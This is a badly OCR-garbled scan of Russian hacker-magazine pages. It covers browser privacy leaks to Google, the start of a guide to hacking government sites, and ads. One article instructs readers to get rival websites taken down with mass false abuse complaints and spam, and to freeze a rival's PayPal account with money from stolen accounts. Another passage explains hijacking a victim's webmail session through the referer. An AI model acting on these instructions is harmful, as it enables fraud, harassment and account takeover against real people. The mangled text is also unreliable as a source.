ИНФОРМАЦИЯ, ПЕРЕДАВАЕМАЯ ЛИСОМ 
узлу ме-ш-Р99.еооеі_Е.сом 

0000: 00 30 80 ЗЕ БЕ 00 00 

АО : С5 С1 Б8 89 08 00 45 00 I 

.0.? Е. 

0010: 03 А9 01 77 40 00 80 

06 : 26 02 53 ЕЕ 21 2Е Б1 55 I 



/зеагс 

0040: 68 ЗЕ 73 6Е 75 72 63 

65 : 69 64 ЗБ 6Е 61 76 63 6С I 
Н?зоигсеіс1=паѵс1 

0050: 69 65 6Е 74 2Б 66 66 26 : 

66 65 61 74 75 72 65 73 I іепЕ- 
ЕЕ&ЕеаЕигез 

0060: ЗБ 52 61 6Е 6В 26 63 

6С : 69 65 6Е 74 ЗБ 6Е 61 76 I 

=Вапк&с 1 і епЕ =паѵ 

0070: 63 6С 69 65 6Е 74 2Б 61 : 

75 74 6Е 2Б 66 66 26 67 | сІіепЕ- 

аиЕо-ЕЕ&д 

0080: 6Е 6Е 67 6С 65 69 70 

ЗБ : 4Е ЗВ 32 30 39 2Е 38 35 I 
оод1еір=0; 209.85 
0090: 2Е 31 33 37 2Е 39 39 

ЗВ : 32 33 30 26 63 68 ЗБ 38 I 
.137.99; 230&сЪ=8 
0 ОАО : 35 31 37 38 31 32 64 

37 : 26 71 ЗБ 69 6Е 66 6Е ЗА | 



Отчетливо виден ничем не прикрытый запрос 
«ѲЕТ /зеа гсЬ?сІіеп1;=паѵсІіеп1-аи1о&доодІеір=0 
;1 532&ідгп=ТРѴВ&огід=0п21п&іе=ІІТЕ8&ое=ІІ 
ТЕ-8&диегуііте=ООВ&і : еаіиге5=Рапк:&д=іп^о: 
ЬНр%За%2!%2іпе2иппі%2еогд%2еги&сН«70 
2785874955 НТТР/1 .1 » с незашифрованным 
адресом ЬЛр%За%2і%21пе2иті%2еогд%2еги . 
который при переводе на нормальный язык 
выглядиттак: Ьир://пе 2 иппі.огд.ги . Фактутечки 
информации налицо! 

А теперь (разнообразия ради) попробуем 
установить панель боодіе ТооІЬаг и посмотреть, 
какона повлияет на конечный результат. Идем 
на уѵѵѵѵѵ.доодіе.сот/іпи/еп/орііопз . находим 
«ТооІЬаг — АсИ а зеагсЬ Ьох Ф уоиг Ьгоѵѵвег» 
иустанавливаем версию, разработанную 
специально для ГорящегоЛиса [ уѵуууѵ.доодіе. 
сот/іооІвЛігеФх/іпсІех.ЫтІ ). При этом галочки 
напротив пунктов «РадеРапк Оізріау» и «5а1е 
В гоѵѵзіпд» должны находиться во взведен- 
ном состоянии («Тооіз -> Ехіепзіопз боодіе 
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ТооІЬагІог Рігеіох -> Орііопв»), в противном 
случае персональная информация никуда пе- 
редаваться не будет (активность Ѳоодіе ТооІЬаг 
никак не зависит оттого, отображается она на 
панели инструментов или нет). 

Повторяем попытку захода на ЫірУ/пегиті.огд .ги 
и смотрим в пакетный лог. В немтеперь вместо 
бессловесных ІР-адресов появилисьдоменные 
имена вЬ.доодІе.сот и ѵѵѵѵѵѵ.доодіе-апаіѵіісв.сот . 
первое из которыхсоответствует Ьи-іп-З.доодІе.сот . 
а второе — тд-іп-199.доодІе.сот . Это легко 
определить, изучив протокол обмена и сравнив 
его с предыдущим результатом. 

Другими словами, в Горящего Лиса изначально 
встроено ядро панели боодіе ТооІЬаг, причем 
без возможности его отключения штатными 
средствами (варианте правкой исходныхтекс- 
тов не предлагать). 

А теперь смертельный номер! Заходим в на- 
стройки боодіе ТооІЬаг и отключаем «РадеРапк 



сделал путем бит-хака, то есть хирургического 
вмешательства в двоичный код, но существуют и 
другие методы, которые мы обсудим чуть позже. 
В Іпіегпеі Ехріогегзакладки от Ѳоодіе 
отсутствуют (еще бы, ведь Ѳоодіе и МісгозоИ 
— заклятые враги-конкуренты). Однако 
поскольку Іпіегпеі; Ехріогег — это сплошная 
дыра (типа «дуршлаг»), то по соображениям 
безопасности пользоваться им категорически 
не рекомендуется. 

□ Кто стучит на тебя? 

Берем пропатченную Оперу, Іпіегпеі Ехріогег 
или любой другой браузер, заведомо не содер- 
жащий закладок, и совершаем марш-бросок 
на ЫірѴ/виЬвсепе.сот . где нажимаем ссылку 
«ЭеагсЬ» и смотрим в пакетный лог. 

Что за черт?! Логбрандмауэра буквально кишит 
обращениями к узлу ѵѵѵѵѵѵ.доодіе апаіуіісв.сот . 
отсылая емузапросы «ОЕТ /игсЫпдв Н ТТ Р/ 1.1». 




> Настройки боодіе ТооІЬаг, ответственные 
за передачу персональной информации 

Выходит, что виЬвсепе.сот (каки многие другие 
ѵѵеЬ-узлы) активно сотрудничаете боодіе, 
добровольно передавая ему статистику нажатий 
нате или иные ссылки, а вместе с ней — персо- 
нальную информацию отипе/версии браузера/ 
операционной системе, языковых настройках 
и даже о... локальном времени, что позволяет 
вычислить географическое местонахождение 
посетителя. 

О Чем это чревато? 

Какой ущерб может нанести утечка персональ- 
ной информации, стекающейся в аналитичес- 
кий центр корпорации Ѳоодіе, при условии что 
она не попадает ктретьим лицам? Начнем с 
простых пользователей. Ну какое кому дело, кто 
куда ходит и на какие ссылки нажимает? Теоре- 
тически Ѳоодіе может отслеживать посетителей 
«неправильных» сетевых ресурсов, пропаган- 
дирующихтерроризм или распространяющих 
педофилию, но ни одного подобного прецедента 
до сих пор зафиксировано не было! Однако это 
еще не означает, что можно и дальше бродить по 
Сети и ничего не опасаться. 
Рассмотримтипичную ситуацию — рядовую 
контору, сотрудники которой в «свободное от 
работы время» смотрят порнографию че- 
рез Ыірв-ргоху, шифрующиетрафиктак, что 
администратор даже и не догадывается, какой 
гадостью занимаются его подопечные. Но 



«ВЛАДЕЛЬЦАМ ѴѴЕВ-СЕРВЕРОВ ПРИХОДИТ- 
СЯ НАМНОГО ХУЖЕ, И УТЕЧКА ПЕРСОНАЛЬНОЙ 
ИНФОРМАЦИИ ПРИВОДИТ К РЕАЛЬНОЙ УГРОЗЕ 
НАРУШЕНИЯ БЕЗОПАСНОСТИ» 



Ѳівріау» и «5а1е Вгоѵѵвіпд» — передача пер- 
сональной информациитутже прекращается. 

И это хорошо! Таким образом, чтобы пред- 
отвратить утечку персональной информации, 
необходимо установить Ѳоодіе ТооІЬаг, залезть 
в настройки и отключить «РадеРапк Ѳівріау» и 
«Баіе Вгоѵѵвіпд». 

Аналогичная закладка имеется и в Опере. 
Однако в силу отсутствия для нее специальной 
версии Ѳоодіе ТооІЬаг, утечку персональной ин- 
формации предотвратить нетак-то просто. Я это 



Какая су... сумчатая кенгуру стучит на нас? И 
откуда взялся игсЫпдв? Это что-то новенькое! 
Ранышетакого не встречалось! 

Просмотр исходного кода НТМЬ-страницы 
быстро выявляет следующий ЭаѵаЗсгі рі, код 
которого и является стукачом: 

<зсгірО згс= "ЬЩДр : / /ѵллпл/. доодіе- 
апаІуОісз . сош/игсМп .]3" 

Оуре= " ЦехЦ /д аѵазсгірЦ " > 

</зсгірО> 



поскольку передача персональной информации 
в аналитический центр Ѳоодіе осуществляется 
в незашифрованном виде, то администратору 
достаточно всеголишьнатравитьдгер налог, 
чтобы всетайное немедленно стало явным. 
Владельцам ѵѵеЬ-серверов приходится намного 
хуже, иутечка персональной информации приво- 
дит к реальной угрозе нарушения безопасности. 
Создает, допустим, владелецѵѵеЬ-ресурса вирту- 
альную директорию, кладет в нее «информацию 
не для всех» и дает ссылку заинтересованному 
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> Перехват чужой поисковой сессии 



ящика жертвы (входящие/исходящие письма), 
листая адресную книгу и рассылая письма от ее 
имени. Правда, сменить пароль, скорее всего, 
не получится, также как и удалить аккаунт, но 
все-таки говорить о безопасности втакихусло- 
виях можно только в саркастическом смысле. 



> ІР-адресу 209. 85. 137. 99 соответствует доменное имя 
тд-іп-^99.доодІе.сот 



лицу. Виртуальные директории не отображаются 
в списке содержимого каталога, и чтобы добрать- 
ся до них, нужно знать полный путь (фактически 
играющий роль пароля). Создавать виртуальные 
директории гораздо проще, чем заморачиваться 
сзаведением новых пользователей и раздачей 
логинов/паролей (тем более что далеко не вся- 
кий бесплатный хостер предоставляет подобную 
услугу, да и платный тоже). Кстати, аналогичного 
результата можно добиться, поместив файл в 
одну из «нормальных» директорий с запрещен- 
ным просмотром ее содержимого. 

Но вся защита рухнет, кактолько лицо, которому 
мы передали секретную ссылку, щелкнет по 
ней браузером, который содержит закладку или 
установленную панель боодіе ТооІЬаг, переда- 
ющую ІІРІ_ в аналитический центр, направля- 
ющий содержимое виртуальной директории 
прямиком на индексацию, после чего любой 
желающий может получить к ней доступ через 
поисковую машину Ѳоодіе! 

Случай из жизни. Была у меня как-то на 
сервере виртуальная папка /трЗ, доступная 
только пользователям с именем ппрЗ и таким 
же точно паролем, где лежала куча всякого 
добра, предназначенного сугубо для доступа в 
пределах домашней локальной сети (в самом 
деле, гонять файлы по витой паре намного 
удобнее, чем носиться с СО/ОѴО-РѴѴдисками). 
И вот в один прекрасный день я заметил, что в 
приватную папку кто-то забрался и качает, при- 
чем не просто качает (как качал бы нормальный 
пользователь), а гребет все подряд, порядком 
напрягая канал. Глянул на адрес и обалдел 
— 82.208. 1 0. 1 6, в поле ІІвег-АдепІ которого без 
всякого стеснения и зазрения совести прямым 
текстом значилось: «МогіИа/5.0 (сот раб Ые; 
боодІеЬоі/2.1 ; +Ыір://\ллл/ѵѵ.доод[е.сот/ЬоСЫт[)». 
Каким же образом боодіе смогузнать логин/па- 
роль кмоей приватной папке? Мысльо переборе 
я откинул сразу, а вотутечка информации через 
закладку, встроенную в Лиса, которым я пользо- 



вался, очень даже могла настучать. Таким обра- 
зом, передавая ссылку на приватный ресурс лицу, 
пользующемуся 6оодІеТооІЬаг(или браузером с 
закладкой внутри), надо быть готовым ктому, что 
назавтра об этом ресурсеузнает весь мир! 

□ Сессии боодіе 

Щелкая по ссылкам, выданным боодіе в ответ на 
наш запрос, мы передаем ѵѵеЬ-серверу инфор- 
мацию отекущей сессии, содержащую в поле 
ге^еггег критерии запроса и соответствующий 
им результат. Вроде бы мелочь, а неприятно. 
Сижу как-то я за монитором, жую бутерброд 
и в ожидании, пока ЮА Рго дизассемблирует 
очередную программу, лениво поглядываю на 
консоль Зппаіі НЛр бегѵег'а. Вдруг вижу, как кто- 
то пытается утянуть рИсЗіиІІ.рсІІ (электронную 
версию «Записок мыщъх'а» целиком). Причем, 
судя по строке геіеггег, человек забрел явно с 
боодіе, что весьма странно, поскольку я активно 
борюсьс боодіе, запрещая ему индексировать 
содержимое своего ѵѵеЬ-сервера по причинам, 
о которых мы говорили выше. 

Нуладно, зашел человек, такзашел. Ведь не 
прогонять же! А вот вставить содержимое поля 
геіеггег в адресную строку Горящего Лиса — сам Бог 
велел. Вставляем. И видим, что на самом деле искал 
человек. А искал он «структура аибіо Сй ргедар 
дар іпсіех», причем изтрех выданных результатов 
его удовлетворил только один — мой. Довольно 
любопытная информация, не правда ли? Впрочем, 
остальные поисковые машины страда юттой же бо- 
лезнью, так что боодіе в своих проблемах не одинок. 
Да что там поисковые машины! б почтовыми 
клиентами, основанными на ѵѵеЬ-интерфейсе, 
сплошь и рядом наблюдается та же проблема. 
Устанавливаем у себя ѵѵеЬ-сервер, отмыливаем 
жертве ссылку на какой-нибудь интересный 
файл. Если она поведется и кликнет, мы заполу- 
чим геіеггег и, скопировав его в адресную стро- 
ку своего браузера, сможем войти в текущую 
сессию, просматривая содержимое почтового 



□ Методы борьбы, 

или записки из подполья 

Для предотвращения утечки персональной 
информации на клиентской стороне достаточно 
использовать Горящего Лиса сустановленной 
панелью боодІеТооІЬаги отключенными опциями 
«РадеРапк Оівріау» и «5а1е Вгоѵѵвіпд». бднако это 
не защитит от сайтов, сотрудничающих с боодіе, и 
для блокированиятрафика разумно прибегнуть к 
персональному брандмауэру, пополнив блэк-лист 
еще одной записью: « ѵѵѵѵѵѵ.доодіе-апаіуіісв.сот ». 
б бперой ситуация значительно сложнее, и для 
обеспечения надлежащего уровня приватности 
необходимо заблокировать множество ІР-адре- 
сов, входящих в распределенную сеть боодіе, 
постоянно пополняющуюся новыми узлами. Ре- 
гулярное изучение логов брандмауэра, похоже, 
единственный способ их вычислить. 
Администраторам ѵѵеЬ-серверов рекоменду- 
ется блокировать всех посетителей, чье поле 
ІІзег-АдепІ: содержит какое-либо упоминание 
о боодіе, или создать файл гоЬоіз.М, пред- 
назначенный специально для поисковых 
машин иуказывающий им, какие файлы можно 
индексировать, а какие нельзя (структура файла 
описана на ѵѵѵѵѵѵ.гоЬоІвІхІ.огд ). Впрочем, это 
достаточно ненадежная защита, и поисковые 
машины могут игнорировать все предписания. 

□ Заключение 

Доступность исходных кодов еще не гаран- 
тирует отсутствие закладок и других компо- 
нентов, о существовании которых рядовой 
пользователь не догадывается. Но, увы, 
слежка и шпионаж проникают в нашу жизнь 
и разрушают право на охрану персональной 
информации, кактермиты, подтачивая ее 
изнутри. Залогом выживания в этом суровом 
мире становится знание сетевых протоколов, 
владение дизассемблером, отладчиками и 
прочими хакерскими навыками. □□ 
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Биррогіз 



Зиррогіз 



ІпіеГ 

Соге 2 

Ехігегпе 

ргосеззог 



И6887АА-8ЕКК82Н 

Іпіеі® Соге™2 Ехігете/Іпіеі® 
Соге™2 ОиасІ/ІпіеІ® Соге™2 Эио/ІпіеІ® 
Репііит Р/Іпіеі® Репііит® 4 ргосеззог зиррогі 
ІМѴЮІА® 680І 8и сііірзеі 
ОиаІ-сбаппеІ 0ЭР2 800/667/533 МН 2 тетогу 
Оідііаі соппесііѵііу 
2 х 1394а роііз 
ЭиаІ-дідаЬіІ УМ 
7.1 сііаппеі Нідіі ОеІіпШоп Аисііо 
7 х ЗегіаІ АТАІІ соппесіогз (1 х еЗАТА) 
10 х 115В 2.0 роПз 



ѴѴіпсІоѵѵз 

Ѵізіа™ 



Москва: РгоГСот - (495)730-5603; ЗіаіІМазІег - (495)783-4242; Шга ЕІесігопісз - (495)790-7535; Арбайт компьютера - (495)725-8008; АРКИС - (495)980-5407; 
Белый ветер ЦИФРОВОЙ - (494)730-3030; Инлайн - (495)941-6161; КИБЕРТРОНИКА - (495)504-2531; Лайт Коммуникейшн - (495)956-4951; НЕОТОРГ - сеть 
компьютерных магазинов - (495)223-2323; Сетевая Лаборатория - (495)500-0305; Форум-Центр - (495)775-775-9; Альметьевск: Компьютерный мир - 
(8553)256-934; Барнаул: К-Трейд - (3852)66-6910; Воронеж: Рет - (4732)77-9339; Екатеринбург: $расе - (343)371-6568; Трилайн - (343)378-7070; Ижевск: 
Корпорация Центр - (3412)438-805; Курск: ФИТ (ТСК 2000) - (4712)512-501; Новосибирск: НОТА - (3832)304-1010; Пермь: Инстар Технолоджи - (342)212- 
4646; Пятигорск: Дивиком - (8793)33-0101; Ростов- на-Дону: Форте - (863)267-6810; Самара: Аксус - (846)270-5960. 















Ты когда-нибудь задумывался над вопросами: где хостятся порно или фейковые 
сурсы; на каких дата-центрах стоят серваки сепаратистских и террористических ор- 
ганизаций? Как ты понимаешь, ни один обычный хостер не станет прикрывать такие 
проекты. Для таких целей существуют специальные абузоустойчивые серверы, адми- 
нистрация дата-центров которых готова закрывать глаза на твои шалости за опреде- 
ленную сумму. Кроме того, с усилением антифродовых настроений на Западе, появил- 
ся новый вид западлостроения — закрытие хостинг-аккаунтов. Как это осуществить и 
как от этого защититься, ты узнаешь, прочитав эту статью. 



Дайте жалобную кни 



^ взлом 



СЕТЕВЫЕ ВОЙНЫ НОВОГО ПОКОЛЕНИЯ 



□ Прикрываем чужой ресурс 

Тебе, наверняка, не разхотелосьпо каким-либо 
причинам приостановить функционирование 
того или иного ресурса. Вроде бы решение 
напрашивается само собой — ООоЗ-атаки. Но на 
мобилизацию армии ботов нужно потратить нема- 
ло времени и сил. Аеще остро встаеттехнический 
вопрос, связанный с наличием работоспособного 
бота. Как ни крути, а геморрой при реализации 
обеспечен. Так вот сегодня мы пойдем другим 
путем. Мы не будем писать бота, не будем созда- 
вать серверный ботнет — мы поступим гораздо 
интереснее, оригинальнее и, самое главное, 
экономнее. 

Ни для кого не секрет, что каждый хостер имеет 
свои правила предоставления услуг. Зачастую 
отдельно оговаривается запрет на рассылку 
спама, размещение порноматериалов, вареза и 
прочих не менее занятных вещей :). Для примера 



возьмем пользовательское соглашение доста- 
точно крупного украинского хостера. Вот л ишь 
некоторые его пункты. 

Клиенту строго запрещается размещать веб- 
сайты: 

1. содержающие любые порнографические 
материалы; 

2. содержащие пропаганду насилия, фашиз- 
ма, коммунизма, экстремизма, терроризма, 
национализма, шовинизма, расовой ненависти 
и/или провозглашающие одну особенную расу, 
национальность или пол как превосходящие 
над другими и/или объявляющие другие расы, 
национальности, пол низшими, атакже содер- 
жащие призывы ксвержениюзаконной власти в 
каком-либо государстве; 

3. поощряющие, поддерживающие или про- 
пагандирующие деятельность, нарушающую 
федеральные, республиканские или местные 



законы и/или нарушающую украинские или 
международные договоренности; 

4 . подпадающие под категорию «ѵѵагег» или 
файловыхархивов, распространяющих матери- 
алы, охраняемые законом об авторском праве; 

5 . пропагандирующие взлом, обход защиты 
программного обеспечения (Иаскіпд, сгаскіпд) 
или распространяющие пароли к веб-сайтам для 
взрослых или любым другим платным ресурсам. 
Обрати внимание на пункты 4 и 5, занятно, не 
правда ли? =) Я не зря привел здесь именно 

это соглашение — дело в том, что большинство 
ру-хостеров имеют соглашения со схожими пун- 
ктами, отличающимися л ишь формулировкой. 

Ты спросишь, мол, для чего нам все это нужно? 
Ответ прост: мы этим воспользуемся в своих 
корыстных целях =). 

Предположим, что существует ресурс 
ѵѵѵѵѵѵ.ЫаЫаЫаЫа.сот, который нам очень 
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>3апускаем рассылку по собранной базе 



и очень не нравится. А располагается он на 
рядовом хостинге, допустим, российском. Как 
приостановить его функционирование? Нужно 
всего лишь нарушить пару-тройку пунктов из 
пользовательского соглашения, после чего 
хостер сам заблокируетаккаунт=). Думаешь, ре- 
ализовать затею нереально? Ошибаешься, еще 
как реально :]. Но прежде составим короткий 
план наших действий: 

1. собираем базу мыльников антифродовых 
контор; 

2. составляемтекстписьма; 

3. рассылаем жалобы. 

Если ты читал мои предыдущие статьи, то 
должен помнить, что собой представляют 
антифродовые конторы и чем они занимают- 
ся. Вкратце напомню, что подобные компании 
создаются с целью предупреждения мошен- 
нических действий в Сети. Многие финансо- 
вые организации и крупные сервисы, в том 
числе и провайдеры, имеют свои а нтиф род- 
отделы. Нам понадобится база мыльников 
таких контор. Сразу отмечу, что полноценная 
база подобного рода стоит несколько тысяч 
американских президентов. Но мы действуем 
в более скромных масштабах, так что сойдет 
и сотня-другая таких еппаіі-адресов. Можешь 
включить в свой лист рассылок даже адреса 
саппортов зарубежных платежек, крупных 
хостингов, провайдеров, антиспамовых 
агентств и общественных антифродовых орга- 
низаций. В общем, все в твоих руках =). 
Следующий важный шаг — составление текс- 
та письма. В нем следует делать упор именно 
на те моменты, на которые плохо реагируют 
те самые конторы, а именно: на фишинг, про- 
дажу кредиток, хакинг, варез, детское порно 
и т.д. В идеале письмо должно содержать жа- 
лобу юзера на сайт-жертву (не угодивший нам 

> Абузоусто й ч и в ы й хости н г 



сайт :)) с указанием причины недовольства 
(распространение банковской информации, 
массовый спам ит.д.). 

После того кактекст будет составлен, следует 
написать ещеоднописьмо. Внеммы будем 
рекламировать ненавистный нам ресурс, 
только пиар будет черным=). Напиши о том, 
что открылся новый портал по продаже 
банковских баз данных, что функционирует 
приватный форум, объединяющий професси- 
ональных мошенников, мол, добро пожало- 
вать на наш ресурс, и ниже кинь ссылочку на 
сам сайт :). 

Теперь остается лишь разослать оба письма по 
собранной базе. Советую отправитьсначала 
антирекламу, а потом уже жалобы. Крометого, 
если у тебя есть пара завалявшихся спам-баз 
с забугорных ресурсов, смело пускай и их в 
оборот. Активные амеры, наверняка, пожалу- 
ются на такой спам куда следует, будьуверен =). 
Особенно хорошо фишка прокатывает с а мерс- 
кими и европейскими хостерам и, поскольку они 
довольно оперативно реагируют на предупреж- 
дения, поступающие отантифродовых контор. 
Однако и многие ру-хостинги придерживаются 
той же политики, так как большинство дата- 
центров находится в штатах :). Если все будет 
сделано аккуратно, то ты достигнешьжелае- 
мого эффекта. Как показывает практика, в 90% 
случаев хостинг-аккаунт просто замораживает- 
ся на неопределенный срок=). 

Кстати, поделюсь еще одной любопытной 
информацией. Подобным образом можно 
заморозить даже банковский счет. Но осо- 
бенно хорошо в ба н ко вс кой сфере прокаты- 
вает перевод денег с краденного аккаунта 
на аккаунт-жертву. Например, ты хочешь 
заблокировать аккаунт неприятеля в палке 
(РауРаІ). Для этого необходимо приобрести 



пару стыренных а мерских а кко в и залить на 
счет неприятеля немного грязных баксов. При 
проведении банковской проверки будут замо- 
рожены все участвующие в прохождении денег 
счета. Воттакая вот неприятность :). 

О Абузоустойчивые серверы 

Прочитав первую часть статьи, ты, скорее всего, 
озадачился вопросом отом, какже защититься 
от подобногозападлостроения. Что ж, лекарство 
есть, но оно стоит денег. Самый оптимальный 
вариант — это покупка абузоустойчивого 
сервера или хостинг-аккаунта на нем. Что 
такое абузоустойчивый сервер? Это сервер, 
способный нести всетяготы информационной 
клеветы/грязи и прочего. Грубо говоря, на по- 
добныхсерверах можно размещать практичес- 
ки все что угодно, отпорников до баз кредиток, 
слитых с онлайн-шопов. Стоить абузный деди к 
будет порядка $600-800 в месяц, в зависимости 
от расположения дата-центра. Но есть и более 
дешевый вариант — покупка хостинг-аккаунта 
на абузоустойчивом сервере по цене $50-100 в 
месяц. В любом случае решать тебе, но, как гла- 
сит мудрая пословица, «скупой платит дважды». 



«МЕНЯ ФЛУДЯТ — КОМУ/КАК 
ЖАЛОВАТЬСЯ?» 

Порой бывает, что ты вынужден писать на- 
стоящую жалобу на какой-либо нерадивый 
хостер. К примеру, на твой ресурс натра- 
вили армию злых ботов, и они нещадно 
поливают флудом серваксхилым каналом. 
В этом случае рекомендую закрыть все 
порты (кроме 22-го, естественно) штатным 
файрволом и собрать базу абиве-адресов. 
Это делается очень просто — врубается 
логирование входящих запросов (в іріаЫев 
— посредством команды «іріаЫев-А ІЫРІІТ 
-р Іср —брогі нужный_порт-) ЮѲ --Іод- 
ргебх "ВАй РАСКЕТ :"»), затем анализи- 
руется журнал, из которого выгребаются 
айпишники ботов. После этого последова- 
тельно запрашивается ѵѵИоіб’ом каждый 
ІР-адрес и выдирается из потока мыльник 
со словом аЬивеЙ. Напоследокзаряжа- 
ем спам-рассылку с жалобой (к письму 
обязательно прикладывай лог — иначе 
не поверят). Разумеется, последниедва 
действия нужно автоматизировать. Как? Не 
мнетебя учить, мой юный кодер :). 
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>Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомле- 
ния! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 




> Абузоусто й ч и в ы е 
серверы располага- 
ются на дата-цент- 
рах, администрация 
которых готова 
закрывать глаза на 
твои «шалости» за 
скромную сумму. 

> Помни, что грамотно 
составленная жалоба, 
разосланная похо- 
рошей абузной базе, 

— залогуспеха :). 
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>Сайтантифишинговой группы 



Я решил выяснить, как к описанным атакам относятся 
некоторые ру-хостинги и каков шанс прикрытия аккаунта 
пользователя. Меня интересовали два вопроса, которые я 
задал представителям хостинг-провайдеров: 

1. В случае обнаружения запрещенного контента (хак/варез/ 
порно), сначала будет сделано предупреждение или аккаунт 
пользователя заблокируют незамедлительно? 

2. Не секрет, что в последнее время распространение 
получили провокационные атаки, вынуждающие хостинг- 
провайдеров замораживать вполне легальные ресурсы. 
Например, известны случаи рассылки спама якобы отлица 
владельцев легальных ресурсов со ссылкой на сайт, что при- 
водило кблокировке аккаунта хостером. Как вы реагируете в 
подобных ситуациях? 

Представитель администрации хостинг- провайдера 
ргоѵізоѵ.пеі мне ответил следующим образом: 

«1 При обнаружении на аккаунте одного из перечислен- 
ных нарушений, действие аккаунта приостанавливается 
сразу. Владелец получает от нас уведомление о том, что 
его аккаунт заблокирован. В зависимости от степени 
нарушения, он может быть разблокирован, при условии 
что нарушение будет удалено в течение 30 минут после 
разблокировки аккаунта. 

2. Да, действительно, в последнее время мы очень часто 
встречаем ложные подачи жалоб на то, что якобы клиент 
рассылает спам. Если жалоба приходит непосредственно 
на имя нашей компании, подобная информация тщатель- 
но проверяется нашими сотрудниками из абизе-центра. 
Чтобы проверить всю информацию по аккаунту, им, как 
правило, достаточно одного часа. На время проверки 
аккаунт не блокируется. Если нарушение заметно сразу, 
то, несомненно, сразу и блокируем». 

Авот какответили на аналогичные вопросы представители 
хостинг-провайдера МиШНОБТ ( тиШЬозСги ): 



« І.Для начала разъясним ситуацию. Контент, содержащий 
информацию поуязвимостям/информационной безопас- 
ности/техникам взлома (нужное подчеркнуть), и обсуждение 
всего этого дела не является запрещенным, иначе нужно 
было бы закрыть практически все сайты, посвященные 
информационной безопасности. Болеетого, среди наших 
клиентов немалоувлеченных информационной безопаснос- 
тью людей, доверивших нам свои сайты. 

Что же касается порнографии, пока в законодательстве 
РФ этоттермин не имеетчеткого определения, говоритьс 
уверенностью отом, что представляет собой запрещенный 
контент в рамках этой тематики, тоже невозможно. Потому мы 
спокойно относимся ктакого рода сайтам, за исключением 
случаев детской порнографии и прочих правонарушений, 
однозначно определенных законодательством РФ. 
Варезные сайты мы стараемся на себя не брать, так 
как специфика подобных порталов вызывает повы- 
шенную нагрузку, а это не вписывается в концепцию 
виртуального хостинга, и нам просто невыгодно 
держатьтакие порталы. 

2. В подобных случаях для нас, собственно, нет никакой 
разницы, кто и где указывает ссылку на нашего клиента. 
Как говорится, на заборе слово изтрех букв написано, а за 
ним только дрова :-)». 

Как видишь, хосте ры по-разному относятся к одному 
и тому же контенту, поэтому важно выбрать именно тот 
хостинг, который будет надежно охранятьтвой ресурс =). 
Кстати, очень популярны датинг-центры Азии и Ближнего 
Востока, так как именно страны этих регионов не спешат 
сотрудничать с США. Поэтому, если ты всерьез обеспоко- 
ен активностью ребят из ФБР, бери сервак на площадке в 
Гонконге. 

ПТНе ЕпсІ 

Несомненно, ложные подачижалоб, входящий спам и 
прочие элементы западлостроения играютсвою роль 
(порой роковую). Поэтому важно хорошо представлять себе 
нетолько методы их реализации, но и средства защиты. 
Абузоустойчивые серверы с каждым днем пользуются все 
большей популярностью. Как ни крути, но за безопасность 
нужно платить. В общем, информацию я тебе предоставил, а 
что делать и как — решать уже тебе. ЗЛ 
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Взлом зоны .доѵ 



АТАКУЕМ ПРАВИТЕЛЬСТВЕННЫЕ РЕСУРСЫ 



В прошлом номере мы говорили о теоретических способах взлома государственных ре- 
сурсов. Наверное, ты понял, что даже в зоне .§оѵи .тіі безопасность оставляет желать 
лучшего. Сегодня мы преподнесем тебе еще один сюрприз — практическое руководство 
по взлому государственных сайтов. Конечно, баги на ресурсах давно залатаны, пото- 
му рассматривай этот мануал исключительно как фантастический бестселлер, но ни в 
коем случае не как руководство к действию. Усвоил? Тогда поехали! 



□ Іпіго 

Уже давно ни для кого не секрет, что многие 
архивы и прочие государственные храни- 
лища данных перекочевали в сеть. Сейчас 
правительство почти каждой страны считает 
необходимым, помимо официального сайта, 
иметь еще и пару серверов под «обществен- 
ные нужды». Что под этими самыми «нуждами» 
подразумевается, не можетзнать, пожалуй, 
никто, кроме непосредственных органи- 
заторов проектов и владельцев серверов. 
Государственные ресурсы всегда были 
окутаны тайной негласности, именно поэтому 
они как магнитом притягивали и продолжают 
притягивать ксебе хакеров. Еслиты хотя бы 



иногда краем уха слушаешь новости, то мог 
заметить, что за последнее время было про- 
изведено несколько громких арестов людей, 
подозреваемых во взломе правительственных 
серверов США, Венесуэлы и прочих. В одной 
из прошлых статей я рассказал о том, как мне 
удалось проникнуть на сервер Национальной 
аэрокосмической ассоциации США ( N А8А) . 

В тот раз я наглядно показал, что даже столь 
крупные государственные проекты могут быть 
уязвимы. Сегодняшняя статья является своего 
рода продолжением этой темы, только в более 
широком масштабе. Сейчас ты узнаешь все 
подробности о безопасности правительствен- 
ных ресурсов некоторых стран мира. 



□ Немного истории, 
или с чего начинается .доѵ 

Доменная зона .доѵ изначально предназна- 
чаласьдля правительственных ресурсов, 
само сокращение «доѵ» — производное от 
«доѵегптепі» (правительство). В то же время 
доменная зона .тіізадумываласьтолько для 
военныхучреждений («тіі» — сокращение 
от«тіІііагу»]. Домены 60Ѵ и МП появились в 
1 984 году и сразу стали «специальными». По 
сути, они являются доменами ограниченного 
использования. 

Домен ѲОѴ создан исключительно для 
федеральных государственных учреждений 
США, и регистрацией доменных имен в этом 
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>Хэши админских пассов на госсервере Макао 



домене занимается Правительственный сетевой инфор- 
мационный центр (боѵегптепі-ѴѴІсіе Редізігаііоп Зегѵісе). 
Домен МП находится под контролем американского прави- 
тельства, в частности Департамента госбезопас- 
ности США. Его специалисты ведут базу доменных 
имен зоны . гтт і I, предназначенной для военных 
организаций и учреждений, отвечающих за безопасность 
страны (о какой стране идет речь, думаю, ты понял). 

Кстати, одно время плата за регистрацию доменов в зоне 
.доѵ не взималась, но позже ее все же ввели: первичная 
рега — по цене в $1 к, а ежегодное продление — всего- 
навсего $500 =). Кроме того, как ты понял, зоны .доѵ и . тіі 
принадлежат а мерам, однако многие страны ввели свои 
поддомены вида ,доѵ.национальная_зона_страны (напри- 
мер, Австралия — .доѵ.аи). Но нас интересует совсем не это, 
поэтомууглубимся в суть вопроса :). 

Нетрудно догадаться, что ни один хуиз-сервис не даст 
нам полной информации по правительственным 
или военным доменам. Аналогичная ситуация 
обстоит и с известным порталом ѵѵѵѵѵѵ.сІотаіпзсІЬ.пеі . 

На запрос по домену ѵѵѵѵѵѵ. паза .доѵ сервис выдаеттакой 
ответ: 

Іошкі 1 сіотаіп епРгуз оп ІР: 198.116.144.49 
[деО КІРЕ/АКШ ІР іпіо] (Кезоіѵесі: 
пазапзЗ . паза . доѵ) 

ІР ІосаРіоп: ЦпіДесІ ЗРаДез [113] — АІаЬата 

— НипДзѵіІІе 

